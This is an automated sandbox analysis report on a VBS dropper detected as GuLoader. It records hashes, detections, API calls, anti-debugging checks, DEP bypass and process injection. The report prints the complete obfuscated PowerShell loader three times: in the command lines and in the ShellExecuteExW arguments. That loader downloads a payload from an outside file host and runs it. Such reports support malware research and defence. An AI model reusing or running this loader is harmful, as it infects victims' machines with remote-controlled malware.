Summary | ZeroBOX

Jagtfalkenes.vbs

Generic Malware Antivirus AntiVM AntiDebug
Category Machine Started Completed
FILE s1_win7_x6403_us Nov. 18, 2024, 9:31 a.m. Nov. 18, 2024, 9:35 a.m.
Size 108.9KB
Type ASCII text, with CRLF line terminators
MD5 1c4aa57519360f60d46d3bf0de522194
SHA256 f2264387079776fe5baf8ffc6fc0bf5064a4f3eebdecdafe9282832b6044ee08
CRC32 722ECBB2
ssdeep 1536:ios/J8lpycCQmmkSXHxMLL1rkpmddq8RcP0DDri/kXMp+U3VqFJ4:E/JygttSB019H5RnPri/k8p+UFq34
Yara
  • Generic_Malware_Zero - Generic Malware

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Jagtfalkenes.vbs

    1932
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

      2388

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Index operation failed; the array index evaluated to null.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: At line:1 char:262
console_handle: 0x0000002f
1 1 0

Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004a48d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2388
region_size: 851968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02580000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2388
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02610000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2388
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72dc1000
process_handle: 0xffffffff
1 0 0

file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline POWERSHELL "<#Lipread Libanons Rafles Aarbgerne #><#Hundespand Topskuddenes Hildebrandine #>$Tyrolervals='Autopathography';function Trningsdragten($Retninger){If ($host.DebuggerEnabled) {$Aktivstoffets=4} for ($Crackerberry=$Aktivstoffets;;$Crackerberry+=5){if(!$Retninger[$Crackerberry]) { break }$Rekonstruhxr+=$Retninger[$Crackerberry]}$Rekonstruhxr}function Indtrre($Graveolency){ .($Decemvir) ($Graveolency)}$Antebridal=Trningsdragten 'klumNClumeG anTB sr.RefrWRosoeprehb DatcKingLIndliBetvE.abbnBertT';$Tonguing=Trningsdragten 'VensMRo.ko muszDansi SpelMonol Manas ri/';$Preage=Trningsdragten ',ardTImmolSwivsRen 1,ymb2';$Sobrere=' Sak[ M,cn raieStiftFord. Mhlsthu ETndeRHeveVFabriPea.c A eEUdfaP RivoN ntIAmirNTavlTPundmToodA Ab Nsluta enig OblEstj.rV js]Udsp:Reco:beskSSuffEfangCUnmouRe erConjiAlimT AksyUnsyPforfRCykloBa btFricO CamCMicrofdeklBrad=Sla $ pblPOktaR Im.E ForAAnnaGu,trE';$Tonguing+=Trningsdragten 'I te5 s t.Pach0Lamp ec(UdbuWEtati,tranRe.sdFuldoTom wForlsRipi ProgN FavTH rd Fore1B,na0 ild.Rawh0bagt;Over striW ydiV linFlso6Forn4 rla;Cock Di cxBegy6 fsa4Flam;g ap Mi drC.usvC.ra:Dock1Cyst3 al1Or.h.Pile0Fer )Tube DubGSaudeMi tcRewokNatao rt/bosw2C.ik0Se i1 pal0 Per0Aut.1Teat0 At,1Swat hydrF pe iKi,gr SuceMappfBa foSowtx Hyp/Jogg1 ong3 ere1Pemp..yst0';$Rstet=Trningsdragten 'Rinku rosBastESlagrPoly- TraaPhonGDarweUdstnTra,t';$Counterarguments243=Trningsdragten 'RavihBlodtTraatAvulpFae s Fre:Re,t/Ur.c/WeekfHolbiCasslLet,eal.edSm lnE.ox.die.eJaunuSkr / Kl lBes.9Bestt MasESam wO erb Ic 9Rad s S p6FlgeaSt,raParaRIndkwCra 5BantfNep y ,doU mbiiDaora rotCsnig0StedlU apfF ri/SjalKSm toSternStamt affr evo eadlRe,ep HomuDelalIschtUnpue GalnBesteTs,r.brndpRdbgs remd';$Mureren=Trningsdragten 'mani>';$Decemvir=Trningsdragten 'Skami posEAr ex';$Grundskyldpromille='Dotationers';$Refleksbevgelserne='\Haremmets184.Ink';Indtrre (Trningsdragten 'Folk$MopeG MicLNatuoSecubM.lta EneLOutr:To.ssAmalkAcr oW.ttm HusaNudagUn.cEF.rsr FodSmy,tvHypeE EntnEnigdvernE 
ibbN,linS,edg=Cocc$FrsteUdstnNitrVFort:RnneASt gPMassPForadSkikaSpuntUnopaChe + at$B lbr NoneTundFUncoLArsee BulKHaanS ktibr.nle Gu.V,enngHalve ernlGeneS BibEAd lrCo sNIvore');Indtrre (Trningsdragten 'Gene$No,ig udbl Sveo TemB ulva Kablfngs:sponsBea kGeneR korITimeV Un.E CenS nexTBisai HuslAfs SConc=Traf$N,maCP inOStyruOmenn PuntGennEBal,rWeddaU aaR Sp gBie uTi eM,ongEMejenZoodtRundsAbso2Stra4Ages3Unpi. ykkSBeloPK ldLPasnIReveTXipe(eva,$ TramTulluEmalRTimbEJourRSherEFrienSnor)');Indtrre (Trningsdragten $Sobrere);$Counterarguments243=$Skrivestils[0];$Teledendrion=(Trningsdragten 'Jewe$KamkgFo sL Ta.oBestBSkraaDe il G.a:CereAModscA,umCForuu C lB NonA Je tSoftiSek O.iscnNdsi= skiN .ayE Ka W,lut-U,loOvalsBtracJKkseETestCPleatMilo em swig,YTam,S EmhtPer.echelmLgdo. Krm$ .maARaggN riktLivseTjleBM.llrConvI S rdOprraRegaL');Indtrre ($Teledendrion);Indtrre (Trningsdragten 'Refl$Cel,A ypocAdrec NumuLycobPrepa Tyrt SysiF etoIs hnD gs.hi sHTilse Re a AspdOvereFolkrSprns Ald[Whip$FerrRHovesFrartInteeMaintdiff]Ant =Veri$ Se,TFlipoAttensurrgatabuC meiSa.rnLuscg');$Skruetrkkeren=Trningsdragten ' jer$EffeAC prc Ni.cmidjuvandb RhiaTakttSwadi EuhoDiscnB st.OpmuDAsfao U twI.dsn Banl SploPolyaVenddpa lFDenti SuplB adeKert(La,e$HeteCuberoAfs.uOleon,ilstDupeeSek r TemaPrivrFin g AbauPhagmKurse As nThintDvrgsDain2V rb4 ren3spar,Noun$MatiFSunniScelnI,oniSouns I.vhungaeroc.d,akt)';$Finished=$skomagersvendens;Indtrre (Trningsdragten 'Cata$Un ogMi,mlFumaOSkruBRonaATranlCrem: TubmB raaRanenM.erUM.anfS naaRumfk SknTEup.uDisaRSinghFrusAMoonn StoD AddlRe he LeoRTeknsTro =Ret,(DeblTStireIndusOctuT ira-Smr PJudiAFlfoTfor.hHa i Leuk$Outsf tori.verNTankIAv,rssiz,hV neePotadA sk)');while (!$Manufakturhandlers) {Indtrre (Trningsdragten 'Vid $SatigaritlG anoT aabforsaFuthl,app:,udiHGynaaTra nAlu d .kas PaykStraeO tlrStykuSibymOversTw.rlDisiyIntes,vereSp etKaffs Top=Ord.$HospHNonpuAsmit W,glDemoeKvalnMotodSciee') ;Indtrre $Skruetrkkeren;Indtrre (Trningsdragten 'A.erSHermtansvaForurDisttElem-nednsOv ll 
VicEKatee pukpBl,t mae4');Indtrre (Trningsdragten ' Gli$,skeG A tlAposOSkalB A,raMastLUbnd:UndoMmaxia An nFranUOmbrFKonga TimKsumptPteru ChorVagahInteA opvnKrigD LiglK ageUnwrrAn.esBumb=En.e(LevnTinteECeyls.sykt mme-G ldPVi,raImplT micHV ll .uis$ hrfBesgiSpecnUn eiAabnsUnseH Un,EMaandReen)') ;Indtrre (Trningsdragten 'c.ra$ AnggIndeLMe cOtoucbBackaBrdpLTr.e:T reH BacASvalaBogmN Netl ActiSaluGFlu Ehents.lag=Dyf $Ne,vg KviLFranOChicBS.ycAPortlFire:S ritMvreEKvikSHyttTKre aFasc1Broo2.ore2card+ Uds+Conv%At.e$Eksps SurKInderTe,sIBo evFifaePo.ySTrimTOpfyiTokslKursSkalk.InstC ,eto ndiuAtron andt') ;$Counterarguments243=$Skrivestils[$Haanliges]}$nomaden=306426;$overconscientiousness=29815;Indtrre (Trningsdragten ' For$HierGNulllTlinoRediBMembAhalvlSe.i: ObccSlaguresumTyk,MPuppeAflsrCrepB SooUAnonnte ad.rid rag= Sto UddaGNo,meYapptHarm-StemcUnspO.ortNNonpTRi ieAnchn,enut,tad res$Hypof Prai SvanOpkaI N,gSSplaHGrune LobD');Indtrre (Trningsdragten ' idr$SlaggSkrilPulcoPolyb eucaTroml Ska:AfsiR Udtu.ffieEufowFriloSilirHagltMedf1 Uni0Mlle0Samt Vo a=Revo crat[ aaS Lo,yBeo sPrivtC,aneS.ism,icr.Beb C,eneoDeten stivUbe,e Magr,eint Mar]Sttt:E ph: auvFfunkrNul o TndmBundBNontaRelasTynge Bes6Hjer4ReinSClontAsparPolei Seln efrgSoci(Rumm$ hacCH lvu ArimF ngmShove UrurEkstbSupeuCappnov rdS,mp)');Indtrre (Trningsdragten 'd ve$CoungAfseL Sg o.ealB AdgACa cL Bre: emiITrasTamatIAf nNPeruEEvolRTil AH,tcr BagYAnap Bri =To.d Inte[AppeSSp.cYLuggS udsTOligetingmHavf.HyleTTriceImmeX.ingtRes..LokoEUdbenPothCU.who iredPresI skjnMerlgIndp]A bu:Octo: tipAMistSStriCRomii supI Til.ReseGme,iEEmottstarS eblTBakorSpalIWrisn ImpGgibl(Scu,$Kom,R GasuUnheekyleWJachO aakrServTkloa1Qui 0 l v0Rout)');Indtrre (Trningsdragten ' Out$ ntgFly lSoroo ZilBRegiARr,aLSti.:PrersS otT wari ErhL FalLLydriHaslNOutrGSkrdSSlada AmanIdeon UncoMorsNBattcBekre.esoRBlya= Prv$OplyiSoulTBurgIC loNaspaeIcefRA.teAVelaRTropyT.tq.BagvSJu pUOmfoBEntosPepttDem,rFremILincN ArbgUdre(Tilt$RigsNNeutO g.nmUdtraDandDSorteHoasNWun , Ref$FiliOEchiV 
sseE Sn,R ympcK,eeOHo eN SmaSunc.csvolI DieeIsodnPateTDox,I DhoODialuTr ksCounN,ratE.aseSPygmSSte )');Indtrre $Stillingsannoncer;"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lipread Libanons Rafles Aarbgerne #><#Hundespand Topskuddenes Hildebrandine #>$Tyrolervals='Autopathography';function Trningsdragten($Retninger){If ($host.DebuggerEnabled) {$Aktivstoffets=4} for ($Crackerberry=$Aktivstoffets;;$Crackerberry+=5){if(!$Retninger[$Crackerberry]) { break }$Rekonstruhxr+=$Retninger[$Crackerberry]}$Rekonstruhxr}function Indtrre($Graveolency){ .($Decemvir) ($Graveolency)}$Antebridal=Trningsdragten 'klumNClumeG anTB sr.RefrWRosoeprehb DatcKingLIndliBetvE.abbnBertT';$Tonguing=Trningsdragten 'VensMRo.ko muszDansi SpelMonol Manas ri/';$Preage=Trningsdragten ',ardTImmolSwivsRen 1,ymb2';$Sobrere=' Sak[ M,cn raieStiftFord. Mhlsthu ETndeRHeveVFabriPea.c A eEUdfaP RivoN ntIAmirNTavlTPundmToodA Ab Nsluta enig OblEstj.rV js]Udsp:Reco:beskSSuffEfangCUnmouRe erConjiAlimT AksyUnsyPforfRCykloBa btFricO CamCMicrofdeklBrad=Sla $ pblPOktaR Im.E ForAAnnaGu,trE';$Tonguing+=Trningsdragten 'I te5 s t.Pach0Lamp ec(UdbuWEtati,tranRe.sdFuldoTom wForlsRipi ProgN FavTH rd Fore1B,na0 ild.Rawh0bagt;Over striW ydiV linFlso6Forn4 rla;Cock Di cxBegy6 fsa4Flam;g ap Mi drC.usvC.ra:Dock1Cyst3 al1Or.h.Pile0Fer )Tube DubGSaudeMi tcRewokNatao rt/bosw2C.ik0Se i1 pal0 Per0Aut.1Teat0 At,1Swat hydrF pe iKi,gr SuceMappfBa foSowtx Hyp/Jogg1 ong3 ere1Pemp..yst0';$Rstet=Trningsdragten 'Rinku rosBastESlagrPoly- TraaPhonGDarweUdstnTra,t';$Counterarguments243=Trningsdragten 'RavihBlodtTraatAvulpFae s Fre:Re,t/Ur.c/WeekfHolbiCasslLet,eal.edSm lnE.ox.die.eJaunuSkr / Kl lBes.9Bestt MasESam wO erb Ic 9Rad s S p6FlgeaSt,raParaRIndkwCra 5BantfNep y ,doU mbiiDaora rotCsnig0StedlU apfF ri/SjalKSm toSternStamt affr evo eadlRe,ep HomuDelalIschtUnpue GalnBesteTs,r.brndpRdbgs remd';$Mureren=Trningsdragten 'mani>';$Decemvir=Trningsdragten 'Skami posEAr ex';$Grundskyldpromille='Dotationers';$Refleksbevgelserne='\Haremmets184.Ink';Indtrre (Trningsdragten 'Folk$MopeG MicLNatuoSecubM.lta EneLOutr:To.ssAmalkAcr oW.ttm 
HusaNudagUn.cEF.rsr FodSmy,tvHypeE EntnEnigdvernE ibbN,linS,edg=Cocc$FrsteUdstnNitrVFort:RnneASt gPMassPForadSkikaSpuntUnopaChe + at$B lbr NoneTundFUncoLArsee BulKHaanS ktibr.nle Gu.V,enngHalve ernlGeneS BibEAd lrCo sNIvore');Indtrre (Trningsdragten 'Gene$No,ig udbl Sveo TemB ulva Kablfngs:sponsBea kGeneR korITimeV Un.E CenS nexTBisai HuslAfs SConc=Traf$N,maCP inOStyruOmenn PuntGennEBal,rWeddaU aaR Sp gBie uTi eM,ongEMejenZoodtRundsAbso2Stra4Ages3Unpi. ykkSBeloPK ldLPasnIReveTXipe(eva,$ TramTulluEmalRTimbEJourRSherEFrienSnor)');Indtrre (Trningsdragten $Sobrere);$Counterarguments243=$Skrivestils[0];$Teledendrion=(Trningsdragten 'Jewe$KamkgFo sL Ta.oBestBSkraaDe il G.a:CereAModscA,umCForuu C lB NonA Je tSoftiSek O.iscnNdsi= skiN .ayE Ka W,lut-U,loOvalsBtracJKkseETestCPleatMilo em swig,YTam,S EmhtPer.echelmLgdo. Krm$ .maARaggN riktLivseTjleBM.llrConvI S rdOprraRegaL');Indtrre ($Teledendrion);Indtrre (Trningsdragten 'Refl$Cel,A ypocAdrec NumuLycobPrepa Tyrt SysiF etoIs hnD gs.hi sHTilse Re a AspdOvereFolkrSprns Ald[Whip$FerrRHovesFrartInteeMaintdiff]Ant =Veri$ Se,TFlipoAttensurrgatabuC meiSa.rnLuscg');$Skruetrkkeren=Trningsdragten ' jer$EffeAC prc Ni.cmidjuvandb RhiaTakttSwadi EuhoDiscnB st.OpmuDAsfao U twI.dsn Banl SploPolyaVenddpa lFDenti SuplB adeKert(La,e$HeteCuberoAfs.uOleon,ilstDupeeSek r TemaPrivrFin g AbauPhagmKurse As nThintDvrgsDain2V rb4 ren3spar,Noun$MatiFSunniScelnI,oniSouns I.vhungaeroc.d,akt)';$Finished=$skomagersvendens;Indtrre (Trningsdragten 'Cata$Un ogMi,mlFumaOSkruBRonaATranlCrem: TubmB raaRanenM.erUM.anfS naaRumfk SknTEup.uDisaRSinghFrusAMoonn StoD AddlRe he LeoRTeknsTro =Ret,(DeblTStireIndusOctuT ira-Smr PJudiAFlfoTfor.hHa i Leuk$Outsf tori.verNTankIAv,rssiz,hV neePotadA sk)');while (!$Manufakturhandlers) {Indtrre (Trningsdragten 'Vid $SatigaritlG anoT aabforsaFuthl,app:,udiHGynaaTra nAlu d .kas PaykStraeO tlrStykuSibymOversTw.rlDisiyIntes,vereSp etKaffs Top=Ord.$HospHNonpuAsmit W,glDemoeKvalnMotodSciee') ;Indtrre $Skruetrkkeren;Indtrre 
(Trningsdragten 'A.erSHermtansvaForurDisttElem-nednsOv ll VicEKatee pukpBl,t mae4');Indtrre (Trningsdragten ' Gli$,skeG A tlAposOSkalB A,raMastLUbnd:UndoMmaxia An nFranUOmbrFKonga TimKsumptPteru ChorVagahInteA opvnKrigD LiglK ageUnwrrAn.esBumb=En.e(LevnTinteECeyls.sykt mme-G ldPVi,raImplT micHV ll .uis$ hrfBesgiSpecnUn eiAabnsUnseH Un,EMaandReen)') ;Indtrre (Trningsdragten 'c.ra$ AnggIndeLMe cOtoucbBackaBrdpLTr.e:T reH BacASvalaBogmN Netl ActiSaluGFlu Ehents.lag=Dyf $Ne,vg KviLFranOChicBS.ycAPortlFire:S ritMvreEKvikSHyttTKre aFasc1Broo2.ore2card+ Uds+Conv%At.e$Eksps SurKInderTe,sIBo evFifaePo.ySTrimTOpfyiTokslKursSkalk.InstC ,eto ndiuAtron andt') ;$Counterarguments243=$Skrivestils[$Haanliges]}$nomaden=306426;$overconscientiousness=29815;Indtrre (Trningsdragten ' For$HierGNulllTlinoRediBMembAhalvlSe.i: ObccSlaguresumTyk,MPuppeAflsrCrepB SooUAnonnte ad.rid rag= Sto UddaGNo,meYapptHarm-StemcUnspO.ortNNonpTRi ieAnchn,enut,tad res$Hypof Prai SvanOpkaI N,gSSplaHGrune LobD');Indtrre (Trningsdragten ' idr$SlaggSkrilPulcoPolyb eucaTroml Ska:AfsiR Udtu.ffieEufowFriloSilirHagltMedf1 Uni0Mlle0Samt Vo a=Revo crat[ aaS Lo,yBeo sPrivtC,aneS.ism,icr.Beb C,eneoDeten stivUbe,e Magr,eint Mar]Sttt:E ph: auvFfunkrNul o TndmBundBNontaRelasTynge Bes6Hjer4ReinSClontAsparPolei Seln efrgSoci(Rumm$ hacCH lvu ArimF ngmShove UrurEkstbSupeuCappnov rdS,mp)');Indtrre (Trningsdragten 'd ve$CoungAfseL Sg o.ealB AdgACa cL Bre: emiITrasTamatIAf nNPeruEEvolRTil AH,tcr BagYAnap Bri =To.d Inte[AppeSSp.cYLuggS udsTOligetingmHavf.HyleTTriceImmeX.ingtRes..LokoEUdbenPothCU.who iredPresI skjnMerlgIndp]A bu:Octo: tipAMistSStriCRomii supI Til.ReseGme,iEEmottstarS eblTBakorSpalIWrisn ImpGgibl(Scu,$Kom,R GasuUnheekyleWJachO aakrServTkloa1Qui 0 l v0Rout)');Indtrre (Trningsdragten ' Out$ ntgFly lSoroo ZilBRegiARr,aLSti.:PrersS otT wari ErhL FalLLydriHaslNOutrGSkrdSSlada AmanIdeon UncoMorsNBattcBekre.esoRBlya= Prv$OplyiSoulTBurgIC loNaspaeIcefRA.teAVelaRTropyT.tq.BagvSJu pUOmfoBEntosPepttDem,rFremILincN 
ArbgUdre(Tilt$RigsNNeutO g.nmUdtraDandDSorteHoasNWun , Ref$FiliOEchiV sseE Sn,R ympcK,eeOHo eN SmaSunc.csvolI DieeIsodnPateTDox,I DhoODialuTr ksCounN,ratE.aseSPygmSSte )');Indtrre $Stillingsannoncer;"
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: POWERSHELL
parameters: "<#Lipread Libanons Rafles Aarbgerne #><#Hundespand Topskuddenes Hildebrandine #>$Tyrolervals='Autopathography';function Trningsdragten($Retninger){If ($host.DebuggerEnabled) {$Aktivstoffets=4} for ($Crackerberry=$Aktivstoffets;;$Crackerberry+=5){if(!$Retninger[$Crackerberry]) { break }$Rekonstruhxr+=$Retninger[$Crackerberry]}$Rekonstruhxr}function Indtrre($Graveolency){ .($Decemvir) ($Graveolency)}$Antebridal=Trningsdragten 'klumNClumeG anTB sr.RefrWRosoeprehb DatcKingLIndliBetvE.abbnBertT';$Tonguing=Trningsdragten 'VensMRo.ko muszDansi SpelMonol Manas ri/';$Preage=Trningsdragten ',ardTImmolSwivsRen 1,ymb2';$Sobrere=' Sak[ M,cn raieStiftFord. Mhlsthu ETndeRHeveVFabriPea.c A eEUdfaP RivoN ntIAmirNTavlTPundmToodA Ab Nsluta enig OblEstj.rV js]Udsp:Reco:beskSSuffEfangCUnmouRe erConjiAlimT AksyUnsyPforfRCykloBa btFricO CamCMicrofdeklBrad=Sla $ pblPOktaR Im.E ForAAnnaGu,trE';$Tonguing+=Trningsdragten 'I te5 s t.Pach0Lamp ec(UdbuWEtati,tranRe.sdFuldoTom wForlsRipi ProgN FavTH rd Fore1B,na0 ild.Rawh0bagt;Over striW ydiV linFlso6Forn4 rla;Cock Di cxBegy6 fsa4Flam;g ap Mi drC.usvC.ra:Dock1Cyst3 al1Or.h.Pile0Fer )Tube DubGSaudeMi tcRewokNatao rt/bosw2C.ik0Se i1 pal0 Per0Aut.1Teat0 At,1Swat hydrF pe iKi,gr SuceMappfBa foSowtx Hyp/Jogg1 ong3 ere1Pemp..yst0';$Rstet=Trningsdragten 'Rinku rosBastESlagrPoly- TraaPhonGDarweUdstnTra,t';$Counterarguments243=Trningsdragten 'RavihBlodtTraatAvulpFae s Fre:Re,t/Ur.c/WeekfHolbiCasslLet,eal.edSm lnE.ox.die.eJaunuSkr / Kl lBes.9Bestt MasESam wO erb Ic 9Rad s S p6FlgeaSt,raParaRIndkwCra 5BantfNep y ,doU mbiiDaora rotCsnig0StedlU apfF ri/SjalKSm toSternStamt affr evo eadlRe,ep HomuDelalIschtUnpue GalnBesteTs,r.brndpRdbgs remd';$Mureren=Trningsdragten 'mani>';$Decemvir=Trningsdragten 'Skami posEAr ex';$Grundskyldpromille='Dotationers';$Refleksbevgelserne='\Haremmets184.Ink';Indtrre (Trningsdragten 'Folk$MopeG MicLNatuoSecubM.lta EneLOutr:To.ssAmalkAcr oW.ttm HusaNudagUn.cEF.rsr FodSmy,tvHypeE EntnEnigdvernE 
ibbN,linS,edg=Cocc$FrsteUdstnNitrVFort:RnneASt gPMassPForadSkikaSpuntUnopaChe + at$B lbr NoneTundFUncoLArsee BulKHaanS ktibr.nle Gu.V,enngHalve ernlGeneS BibEAd lrCo sNIvore');Indtrre (Trningsdragten 'Gene$No,ig udbl Sveo TemB ulva Kablfngs:sponsBea kGeneR korITimeV Un.E CenS nexTBisai HuslAfs SConc=Traf$N,maCP inOStyruOmenn PuntGennEBal,rWeddaU aaR Sp gBie uTi eM,ongEMejenZoodtRundsAbso2Stra4Ages3Unpi. ykkSBeloPK ldLPasnIReveTXipe(eva,$ TramTulluEmalRTimbEJourRSherEFrienSnor)');Indtrre (Trningsdragten $Sobrere);$Counterarguments243=$Skrivestils[0];$Teledendrion=(Trningsdragten 'Jewe$KamkgFo sL Ta.oBestBSkraaDe il G.a:CereAModscA,umCForuu C lB NonA Je tSoftiSek O.iscnNdsi= skiN .ayE Ka W,lut-U,loOvalsBtracJKkseETestCPleatMilo em swig,YTam,S EmhtPer.echelmLgdo. Krm$ .maARaggN riktLivseTjleBM.llrConvI S rdOprraRegaL');Indtrre ($Teledendrion);Indtrre (Trningsdragten 'Refl$Cel,A ypocAdrec NumuLycobPrepa Tyrt SysiF etoIs hnD gs.hi sHTilse Re a AspdOvereFolkrSprns Ald[Whip$FerrRHovesFrartInteeMaintdiff]Ant =Veri$ Se,TFlipoAttensurrgatabuC meiSa.rnLuscg');$Skruetrkkeren=Trningsdragten ' jer$EffeAC prc Ni.cmidjuvandb RhiaTakttSwadi EuhoDiscnB st.OpmuDAsfao U twI.dsn Banl SploPolyaVenddpa lFDenti SuplB adeKert(La,e$HeteCuberoAfs.uOleon,ilstDupeeSek r TemaPrivrFin g AbauPhagmKurse As nThintDvrgsDain2V rb4 ren3spar,Noun$MatiFSunniScelnI,oniSouns I.vhungaeroc.d,akt)';$Finished=$skomagersvendens;Indtrre (Trningsdragten 'Cata$Un ogMi,mlFumaOSkruBRonaATranlCrem: TubmB raaRanenM.erUM.anfS naaRumfk SknTEup.uDisaRSinghFrusAMoonn StoD AddlRe he LeoRTeknsTro =Ret,(DeblTStireIndusOctuT ira-Smr PJudiAFlfoTfor.hHa i Leuk$Outsf tori.verNTankIAv,rssiz,hV neePotadA sk)');while (!$Manufakturhandlers) {Indtrre (Trningsdragten 'Vid $SatigaritlG anoT aabforsaFuthl,app:,udiHGynaaTra nAlu d .kas PaykStraeO tlrStykuSibymOversTw.rlDisiyIntes,vereSp etKaffs Top=Ord.$HospHNonpuAsmit W,glDemoeKvalnMotodSciee') ;Indtrre $Skruetrkkeren;Indtrre (Trningsdragten 'A.erSHermtansvaForurDisttElem-nednsOv ll 
VicEKatee pukpBl,t mae4');Indtrre (Trningsdragten ' Gli$,skeG A tlAposOSkalB A,raMastLUbnd:UndoMmaxia An nFranUOmbrFKonga TimKsumptPteru ChorVagahInteA opvnKrigD LiglK ageUnwrrAn.esBumb=En.e(LevnTinteECeyls.sykt mme-G ldPVi,raImplT micHV ll .uis$ hrfBesgiSpecnUn eiAabnsUnseH Un,EMaandReen)') ;Indtrre (Trningsdragten 'c.ra$ AnggIndeLMe cOtoucbBackaBrdpLTr.e:T reH BacASvalaBogmN Netl ActiSaluGFlu Ehents.lag=Dyf $Ne,vg KviLFranOChicBS.ycAPortlFire:S ritMvreEKvikSHyttTKre aFasc1Broo2.ore2card+ Uds+Conv%At.e$Eksps SurKInderTe,sIBo evFifaePo.ySTrimTOpfyiTokslKursSkalk.InstC ,eto ndiuAtron andt') ;$Counterarguments243=$Skrivestils[$Haanliges]}$nomaden=306426;$overconscientiousness=29815;Indtrre (Trningsdragten ' For$HierGNulllTlinoRediBMembAhalvlSe.i: ObccSlaguresumTyk,MPuppeAflsrCrepB SooUAnonnte ad.rid rag= Sto UddaGNo,meYapptHarm-StemcUnspO.ortNNonpTRi ieAnchn,enut,tad res$Hypof Prai SvanOpkaI N,gSSplaHGrune LobD');Indtrre (Trningsdragten ' idr$SlaggSkrilPulcoPolyb eucaTroml Ska:AfsiR Udtu.ffieEufowFriloSilirHagltMedf1 Uni0Mlle0Samt Vo a=Revo crat[ aaS Lo,yBeo sPrivtC,aneS.ism,icr.Beb C,eneoDeten stivUbe,e Magr,eint Mar]Sttt:E ph: auvFfunkrNul o TndmBundBNontaRelasTynge Bes6Hjer4ReinSClontAsparPolei Seln efrgSoci(Rumm$ hacCH lvu ArimF ngmShove UrurEkstbSupeuCappnov rdS,mp)');Indtrre (Trningsdragten 'd ve$CoungAfseL Sg o.ealB AdgACa cL Bre: emiITrasTamatIAf nNPeruEEvolRTil AH,tcr BagYAnap Bri =To.d Inte[AppeSSp.cYLuggS udsTOligetingmHavf.HyleTTriceImmeX.ingtRes..LokoEUdbenPothCU.who iredPresI skjnMerlgIndp]A bu:Octo: tipAMistSStriCRomii supI Til.ReseGme,iEEmottstarS eblTBakorSpalIWrisn ImpGgibl(Scu,$Kom,R GasuUnheekyleWJachO aakrServTkloa1Qui 0 l v0Rout)');Indtrre (Trningsdragten ' Out$ ntgFly lSoroo ZilBRegiARr,aLSti.:PrersS otT wari ErhL FalLLydriHaslNOutrGSkrdSSlada AmanIdeon UncoMorsNBattcBekre.esoRBlya= Prv$OplyiSoulTBurgIC loNaspaeIcefRA.teAVelaRTropyT.tq.BagvSJu pUOmfoBEntosPepttDem,rFremILincN ArbgUdre(Tilt$RigsNNeutO g.nmUdtraDandDSorteHoasNWun , Ref$FiliOEchiV 
sseE Sn,R ympcK,eeOHo eN SmaSunc.csvolI DieeIsodnPateTDox,I DhoODialuTr ksCounN,ratE.aseSPygmSSte )');Indtrre $Stillingsannoncer;"
filepath: POWERSHELL
1 1 0
Rising Trojan.Starter/VBS!1.10517 (CLASSIC)
huorong Trojan/VBS.GuLoader.m
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
parent_process wscript.exe martian_process POWERSHELL
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Process injection Process 1932 resumed a thread in remote process 2388
Time & API | Arguments | Status | Return | Repeated
NtResumeThread | thread_handle: 0x000004ac; suspend_count: 1; process_identifier: 2388 | 1 | 0 | 0
cmdline POWERSHELL
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe